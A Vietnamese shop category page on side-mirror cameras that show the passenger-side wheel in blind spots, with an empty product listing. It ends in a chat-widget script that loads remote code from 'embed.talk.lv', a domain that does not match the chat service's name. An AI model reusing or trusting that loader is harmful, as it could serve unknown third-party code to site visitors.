Camera gương

Camera gương hay còn gọi là camera cập lề được lắp tại vị trí mặt dưới gương bên phụ. Camera gương cung cấp hình ảnh chi tiết bánh xe bên phụ khi xe vào các góc cua mà tầm nhìn của tài xế bị hạn chế ( điểm mù ).
Camera gương sẽ hiển thị hình ảnh trên màn hình DVD của xe hoặc có thể sử dụng màn hình taplo, màn hình gương để hiển thị hình ảnh của camera.

Không tìm thấy sản phẩm nào khớp với lựa chọn của bạn.

var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date(); (function(){ var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0]; s1.async=true; s1.src='https://embed.talk.lv/666d0cb9bc592c18a31f4fa4/1i0cvjdor'; s1.charset='UTF-8'; s1.setAttribute('crossorigin','*'); s0.parentNode.insertBefore(s1,s0); })();